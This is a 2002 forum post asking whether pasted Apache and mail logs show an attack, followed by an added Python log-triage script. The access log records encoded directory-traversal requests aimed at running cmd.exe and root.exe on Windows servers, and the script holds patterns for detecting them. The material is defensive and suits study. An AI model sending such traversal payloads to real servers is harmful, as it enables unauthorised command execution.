Could an expert please take a look at my logs and tell me whether someone is attacking? Thanks!

Posted by cfs2 on 10-06-2002 10:06:

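Please take a look at these log excerpts. Is someone attacking? Did the attack succeed? How can I prevent this from happening? Is there any software that makes it easier to monitor how the network is running, and to see who is accessing which services? Thanks!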

The web server is Apache 1.3.26

The mail server is qmail

httpd-access.log file

218.2.194.143 - - [29/Aug/2002:22:28:59 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:28:59 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:28:59 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"

218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"

maillog file

Oct 5 00:00:00 server newsyslog[1581]: logfile turned over

Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(IPv6:::1) failed: 1

Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(218.2.159.2) failed: 1

Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(218.2.159.231) failed: 1

Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(218.2.158.44) failed: 1

Oct 5 03:01:53 server sendmail[1950]: g94J1r99001950: from=root, size=438, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost

Oct 5 03:01:53 server sendmail[1989]: gethostbyaddr(IPv6:::1) failed: 1

Oct 5 03:01:54 server sendmail[1989]: gethostbyaddr(218.2.159.2) failed: 1

Oct 5 03:01:54 server sendmail[1989]: gethostbyaddr(218.2.159.231) failed: 1

Oct 5 03:01:54 server sendmail[1994]: g94J1sYC001994: from=root, size=2573, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost

Oct 5 03:01:54 server sendmail[1989]: gethostbyaddr(218.2.158.44) failed: 1

Oct 5 03:01:54 server sm-mta[1998]: g94J1sSC001998: from=<[email protected]>, size=770, class=0, nrcpts=1, msgid=<[email protected]>, proto=ESMTP, daemon=Daemon0, relay=localhost.mydomain.com [127.0.0.1]

Oct 5 03:01:54 server sendmail[1950]: g94J1r99001950: to=root, ctladdr=root (0/0), delay=00:00:01, xdelay=00:00:01, mailer=relay, pri=30063, relay=localhost.mydomain.com. [127.0.0.1], dsn=2.0.0, stat=Sent (g94J1sSC001998 Message accepted for delivery)

Oct 5 03:01:54 server sm-mta[1999]: g94J1sSC001999: from=<[email protected]>, size=2905, class=0, nrcpts=1, msgid=<[email protected]>, proto=ESMTP, daemon=Daemon0, relay=localhost.mydomain.com [127.0.0.1]

Oct 5 03:01:54 server sendmail[1994]: g94J1sYC001994: to=root, ctladdr=root (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30060, relay=localhost.mydomain.com. [127.0.0.1], dsn=2.0.0, stat=Sent (g94J1sSC001999 Message accepted for delivery)

Oct 5 03:01:54 server sm-mta[2000]: g94J1sSC001998: to=<[email protected]>, ctladdr=<[email protected]
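
An added example, not part of cfs2's post: one way to triage an access log like httpd-access.log above is to percent-decode each request path repeatedly, flag requests for cmd.exe/root.exe, path traversal or overlong UTF-8 bytes, and check whether any of them was answered with a non-error status. The names `triage` and `normalize` and the fourth sample line are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# First three lines are copied from the post; the last one is constructed.
SAMPLE = '''\
218.2.194.143 - - [29/Aug/2002:22:28:59 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
192.0.2.10 - - [29/Aug/2002:22:30:12 +0800] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
'''

# Apache combined log format: client, ident, user, [time], "METHOD URI PROTO", status, ...
LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def normalize(uri, rounds=3):
    """Percent-decode repeatedly so double encoding (%255c -> %5c -> backslash) is exposed."""
    for _ in range(rounds):
        decoded = unquote(uri, encoding="latin-1")
        if decoded == uri:
            break
        uri = decoded
    return uri.lower()

def triage(log_text):
    """Return {client_ip: {"probes": count, "served": [URIs answered with status < 400]}}."""
    report = defaultdict(lambda: {"probes": 0, "served": []})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, raw, status = m.group(1), m.group(2), int(m.group(3))
        path = normalize(raw)
        is_probe = (
            re.search(r"(cmd|root)\.exe", path)   # Windows shell binaries
            or "../" in path or "..\\" in path    # traversal visible once decoded
            or re.search(r"%c[01]%", raw, re.I)   # overlong UTF-8 lead bytes
        )
        if not is_probe:
            continue
        report[ip]["probes"] += 1
        if status < 400:                          # 2xx/3xx: the server returned content
            report[ip]["served"].append(raw)
    return dict(report)

if __name__ == "__main__":
    for ip, r in triage(SAMPLE).items():
        verdict = "REVIEW: some probes were served" if r["served"] else "no probe was served"
        print(ip, r["probes"], "probes;", verdict)
```

A probe that appears under `served` is the case that needs investigation; requests answered with 400 or 404 were rejected by the web server.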